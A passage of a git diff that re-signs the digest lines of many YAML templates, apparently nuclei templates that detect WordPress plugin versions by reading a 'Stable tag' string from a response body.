'(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022047cf2cc1a38a1c326dbf1ab9576d64af7d79c652f2bd5ad49dec8d31b66b61ef02207b8b253c6c626ae78ff03ec169b29c7956d9a66547e6cff53430f87c2da5dbd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daac4e1bed304c29130e0a8e82d8454ceb649abe3438ed7d1e68792ccbcf59e70220591a441d16408bddfa1f78013abfec9a1307b0737bfdf2c612d1953efae39151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 2a1ba679e5..43ac6aed9c 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009b014e0faecbae7a24161ab850164305d28bedc8daa61f81024b7c15b93d82b6022100baf1d7737e306faa80e6a7652c45034672593853a8af687ff07343d1c53fecb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e846b98742832b5f6068a4ea1cfef3b0a2cfe1e0d9700c81fe8a580f83d5ac600221009c7e5365da616db41599572d8a7e8cf3bfd61da0daf1819970f6c6c9bb08cf97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index aa369714a6..8bb1a15d8f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201f0463206a814209a145b359ee66902edbbbdbfec97e0e0f907763c22af474560220457f2938b1175c902413a37fa23e0ae63386bc9ada4b8ed76512c637f65d0860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022b8ffad732d12c02175e227332c9c4714bbf677a386865e08406db320a3aeb6022100a6c215e5007a504f5dda334014487a7d51eed3eb4f5995e2651b2f0522767b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 26ea903529..3fe2b52570 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220025ef67774ef14bee62c670ca5cba709f08d6e5bb8a61af9daf5284c3c0149b602200dc8f5ae973f36870a6452a015f583e98a681978a3ba1885aea441820f0dff17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b37b92dba5e8a716f6b64d60f6c474c572054f5dbfdf2bbcf2ba682b447bd9302202d6195f28b6b7498dc523141179ac2ef3d3bbb2c2f5962cfc984d5eb886cc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 4efb2aa8ad..bb1cd92d52 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c1e932f52933f13b6501d0b62a804e5ddf1d737cab54eddff6c0bb652227416802206d5561e4a2e185f88b231561b90e9ef49fc678c06f28b9a26111f2873d0acdae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e0145b210c2d7d92fd857078a28030fe8d87b5cc78d8f6020516c95e10a584302200fcdc79eee114d69645c72e2b236f9322c1677b324e112336a9db298ccb914fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index d207e0f1e5..c670821a3f 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009898e6eaca1d2d39e76063a4f52d1794eee0950caaf0858b015f3db1fe92613e02207a102a8565bacb2533ca1988e02dbcd68441e11938e9b5dd35b5522a1e9e3402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e8f9d71464aa7961f5bb89ce0efe68b9c19059a7edd2b9e65a5f24cfebbcee702210085e87fe23223fadbf4dae3fe76ebec4e6b4a45b0f1a4a60f49227fd3f20e235c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index ab66cd5781..8cc06e5897 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022025572ed5771c838625df82f00bd940c72113c6a941325f6ebadb9c91733e379f022100853a18720e9ee0c0fe90d9cca92622363789608e1544fe30ab2cb6151bdb7390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe6bbbe921be2b2e2e1a14568101ce823094c0f16f5e89eabf390c83b385454b02205e46103d56c106cd8f05b1af4afb6f64c8e8b787ea1ff698cc0f8a6518e34ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 2af921708e..a4c9b4c246 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220407c5fa6ad70d271e714d703c9ab7bc68b5ab65348756b88d5c6a14c587b3bd5022100fbb5444ee3556ce0394b6b094367da0eef893922d3bed5f625aec9d270f08cb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205900187f6a253d8f3a275ca4dc2c9724f53f2d6f9ab3a2666662f15f96ff22fb022100ec350592545281279d34d72cdcd8572ca13ac599187f20acc396d132062f78c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index be5492b28f..ae3e16bf99 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fca9ca8dd22e8a428784650723bf6595449624fd5d1befc77ebc5265709929c4022100eb3cdb4f7c4e98e2347cf472cd098dab26c097059a3f29f1aec1a99028604e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072625e338cc8471cce0e767a7f8c4544e0549b58d245926c152b2b2d5cd12c42022100f7771467cb49de2cabd12f061c510bb0064b8b529bb17ed045fa8e16c8deaf59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 621bb27dd2..7f23271f6b 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200d179534e5460b5237b53116bb1f7d31b230c38b606c264395b36766073e1dec022100c2ab47d2f4d1817c9d9427770a70d041f93a613cd10fd6df88201354ea7d8673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009788cdc666c44bc859751d5c7a6887c1237bbe4202c699fb4b2f28020426e50f02202c5da233d40a66d6c76143508ecde74fe6985e318dd987d63f80790eaabd8c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 80deaa4889..15fa282169 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ef835299f348f8b5457e6fda6045f050104123e6deb63bb852802e6c515c452502200f183607c3d26b111241df408b1dec6c51761a531edfc79dc56e33f1c1631062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c6d05defba3cc85cc96343f6dfbd313e6e50c02e85c5e5dcc49b50403a4dccc02200a6508054d96cc08e5383cb70ff7251083b26d096b0ab118a00cbf97d6b6112d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index fe79a0d607..ac4191f5f9 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cd7c26a0b7edc13bca50e120d37bf413a70047abd26ee07b773e9e4519a4a2b9022100b3bde475836e6f5a4232eb250410485d16c73d9aba78719260524808211aa540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202785c3d0e92fea95627022502ce5158b2248307f526c1ff371fad8f4e611d62702204b11237e70554cfda15c52f28b937ac90604d2e30567f647656333043d715077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index d37575b7e1..f816e3df32 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b8ef6390c79cd53b7503190b6f34a5e0c4c677583f00c5000b5a46eedc69d51602205038725f750dbc8156eb5aa6a2a0ff71eee48b1fc2421f400f390ba81df26203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b11a545cbc266c49a11dd5e24787da4a10bbc9bf6a90c5db570bbc6798835652022100c0c3b736395fb91892b79317bca2f1114007ef8f8f1cb9987c55e0360c4769b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index cb9482aa4d..321ec67eb3 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e8d4231faca4c91a5d49dfa67bd824880abf796917cda90247265561e338a4e1022062140e7f8c5b29dbcc27d24ba360ac0aa329321eb0c3faf95dbf3d19a2dbf78f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6dfe400bcd9848f2c9b264183ad5497c3518d3e285f97d98035b84d45d0de61022100eda0ffc31b29e2e65746b8d346e3c15edb72a9ebaa6f38a070aa307672e3d86b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 9dff0308e5..17bfd04ac7 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200b5acf197da2ccb059a8698ddcc39cb03c4de0164b4016ca99b33de1d3109c1a022100df691845fbf1485020956f38fd77912cb5418680090f9669e04ad764846910c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099bc1bd91df12cf00cc1963ae7ff06351eaa54a94d1685807df92c538e41a1aa022100cb28ebb65beefc034b4f1918b42115d290c9ab1c953cb7f1de4cb7649a1adf52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 5062977a91..8a9c256d1e 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022017af82a106dbaa0d646c4f013125fd6f5ac1894ba9c77798c7caebcf397eedc5022007b71f9583b807897c99230098f61f7515f67fd720d43c84d2bf297a7c4c47e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009605a69af938be48d39fac2f2db55a60998149898d638d6b95e60270b719bc0402202fe88b468651ddb520f797cc819204214d747ff7b5d5c101746d59fd5e931881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index b43a5aedcd..6673880d69 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022079289b2ecbad04244d567b17c021db23e2b9ac411a136e571840d2c531306fd502200622ed634470b5fd4319283eac3796d83d952229a613aed72a447421b8678358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce2496c8011f9d966769c9eca7f14fd6e6dc7b1e4a4f29947ee41e8c5b9a4ca4022100f61ad8039eef7f94528cead425c32d07040fc49f9f6b884ba61e018e7d2bb024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index b13e6360cf..a3579f49cc 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cddb55d18fa111fe9c9e866cb369d77d8be1b1c8bd55795f01e6f3769031e7da022100e3ea0db117efd3f3a596591e37c4efeb848c48f869f676abcaebfae244d0c1c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203caf1e2af63be48229642b3633e2b5d5ec4ac8c4dc8a78070ddb915e909de1910220434e00fcaa2615ba17572cb1d7a865d8d09deb2728d805fd16b9c558748565d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dd683d8f75..a4114d98b1 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100db9c748c5612a78658dd2bce177e2b5d12828f06772e8357be4ff50ffb7f5886022045f7423ba8e7fd579e7a144a71e77cd561b556a79c8f25445c6a47d5318f4b1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022013d9295be0b33abedf444992ea85d4a6ffe85792e78606f2881770d6b73d9066022100e57e5cef311cae3b67f1657ec6538aa433da46c7a0115fe14a874e848f94f8ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index f209168aa4..4d76c698af 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100aac01d062631c487e9963d838cbb23822e26865176eaebcca2db08e9fd1c0d78022100c219cdc6e5562fac064211e67430219bcfd19c280975e9b7392c69353253a012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e66a2aa391f48986446ca5b5c1575485ef2a696c0109e3dcc03e0c0a71c672d002210082d1dd3f6abc61d96735a456812211d8c350c647879fbb9722917b6133c95424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1e606680ed..5d885de497 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022036862b1f627160fa7da2cf042c0129a59fa4007479aafb01d444b51dcff07425022100f88572578d745c7c7e83a139fa4cc1a34e864d920b7844b57fe25858b67bdce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f24552e180e8752279c673bf3d9a0d1af0274a9ad62664bd2fe3b4d8efb2ed37022100f4689404614d0559252703867cf18215de328130971f47668ba7ecbdc2985f4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 447966cf03..dbb2fdcda6 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f6a4cc7c09d91915b74bcf4e3a122ade9ccb9be1f278e927bcf8bd3652fbf0ee022040d9ae9c7872747ac62e5550906b5d9328784731772fad7174da38d4079c2d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220008ab6ea8c47de439412e244bdc3198f171417b3b84cb79e5a104476a262adb002207eee305920531a83fa8e4fa99892a79652ee57e307865eee719203ba224dd937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index d121c3c9a9..da7be22d4f 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022013af0bcd7d8b13026328a15c952fbdaf00dc6f3ef70a57a930ac271513e2852b022100a4a6f8fe871bc37ec31ec50410379282b3957069701c7a24d943ec2c98a2a8e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210095f0ade0e04968f233348a9edb347985d6675278694a491d19fd46b93e04d61f0220736bcda0ec1e6f1e50223c37612cdd4c9463e1ec7131d3fcad0087aee7173c89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index bb268fff0c..a856b54c0d 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a68e921f27b85656a4cd74d3bd8495d0021929e82d9fd955c521e8929dc93f51022041ed73ecbc181cda7ed4d268ddafe6c600de8a9afc2d72b94f1ddb4e4e46b4e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220382dad1799339ed00069a47b2e08894c13b4a15a6d09da2527501aafffab23fc022100aa9338c7d95a8ed2025d4a1832d4f833c23635e3b62ba619fe64689d05b64d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index cf36d2b24c..f1db05b09d 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204b29425a37e7603afca939f772d4f73507924674195bdc8958390393351f145c022100cd5ad642044810bddffce2168dbd75e58952f2cd7683bf67bc4eaae4687a3a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220145943f8bbd1083a494f11c23b184cc51f9a3834ef84d6dbb5f0df00538883f602204295fb7db3929b0a67f2c16e8255ace5e9064efc6d381bff75032e9d8215c54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 7ee4c0b70a..1e98d891ca 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205a08b92f8904c0aaedc90e2cdbbe93f37a8d420ff2724954f861c94b2b61cb94022061503e244907a0450b86e6b87060f7927fdbec3576a09ed4580b26499d8f9c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c542b17c7fa25346ce46956cf573d141ea436bb242fba304907d777ea5fb7672022100b3dc3c7370cc0c0ba517ebb9755cd2b7a22919a529db449a7ccd8c076cda4ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 3294aae2c5..e8f3a18e74 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b6bbcc8fdaee9ab22b2d295b6e3ddf24a7374e6cab3be361f941bdb1330a6913022100f5b8d94ed42569dd0f4c74911f9d0b3ad477c9ebea24eb42dda8f2c84afbb184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041f6f8568a2683a4be1db198dec9c42ad1ae403f97c1bda0d414081aaee3817902207772e67e3593afdcc79f4b703269bd94457f1555b4662d8378ab4c286a838dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 643ddb2abc..21af1f411d 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a9c2ed250bbaafece3f8712df4a41f587b722ae0519bb49198e2fa0a0400a85302203fe874ba601d169d95194405e12a10f5de63800d18eaa29fbc826edf71569dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c40fb474fc4bebbb614510a15ca0c4f7461c5bd7374de4b0867d3d09042ff053022100c4df9b49a660d350016f5e62ae6552a84738934cf52db272ce02e24c5ac3656d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 9c8d47154c..04c541a239 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d6156edca5c899a5aca55d338656e7adf269bc508fae19599a3bfbe1434c3ca8022010989d574bc1a98888ed1f32d754f744b000dd6e0f6d116b6b3440217e6f0fb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220490352b6f58b2dbb6428e9fd2a12b1ba9123b7af0561241d4871d82ace0a251602204b5f5c87508317e89fa59b9427c4b7c31c14392e6ad1766d4e6c01da983b06cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 758d809772..6ddc83b50f 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204923fe45ecddbac71640697b80dc4be5ebbe92e6bd115da65c9163c47a846fff02203f3eda7ecbe5ec017e9ee304d54f325147036a67fdfd8fd0448109c853903408:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220381feffca50b23c67a683f04f8e2cd38baac2e013f4b225dfe995f452e3229c70220117b46fbaea57dc0adf3e9c3468502161bbb9607dcc6277eb43fa388a9b61ce6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 4fae77e1bb..e4e5486080 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022056313ef65b3b257c3653c933e85b6f06bdece76f839447ee71160229e8f3456d022100b3814fd0dec10370ad144dffaf567b71b7e7d9bab53552c89c07496b659f4342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204542fb7bc61b3bb8501e326edf84819c4d2eb38687d0569a00b89f49cc53233002200dd35897eb5d01c618a0d8617d5d339afbd77951208d4e89ecbaed6464e499a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 3d40828ef9..8a33377658 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203c30b93ed05c8f5f0617b935e03aa5fda7d90103b44537153cb323fb3c2484e6022005c767f2a1a932f1b701a52082c1ea3b5265d6ebced606cb6cb6be270650bd91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220783a2ed35bd4b3ec5b72e66ef753c55055c997de64f43fe38fcd01fbb1e4c396022038a1ad33efc338e1fe2d4f535e4c51ac486396692f3561504923d454694405cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 841a8a4311..e680fcce95 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008e3a5caa420d1cfbeaea691ac93341497f11a8660e86c41ca72382c1a763b782022100f8d6ec402a75a2c70aeab580fb202dd78cabe824361fdcea6c7b43533fb9097d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220779692333bd053d819e0ba06d97f5e5b8d54edf670d7a96bfaa653a5bb6a9b0f022100d667dcbed401698a7124c75510e5b1cd85b849d7eccf62e66774f8e5ed7a8f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index c35ed9cd91..6527e86516 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205a440437aeadfb3bf51ab52532460568cef9a29bfab7d6d4f3f119cec9a5e401022100dc041fce274b44ee9371bdc0d443a1b9f2cadeff7cd4e3862272b4d6d5a347ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa4285b23f2b40d353500dd5a653fc116a94dba11349509a84d19ab5e5c5acb00220448d4665d7be8b6390e759539f43bd79e171c03a108dd1deefd9ebf7333383f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 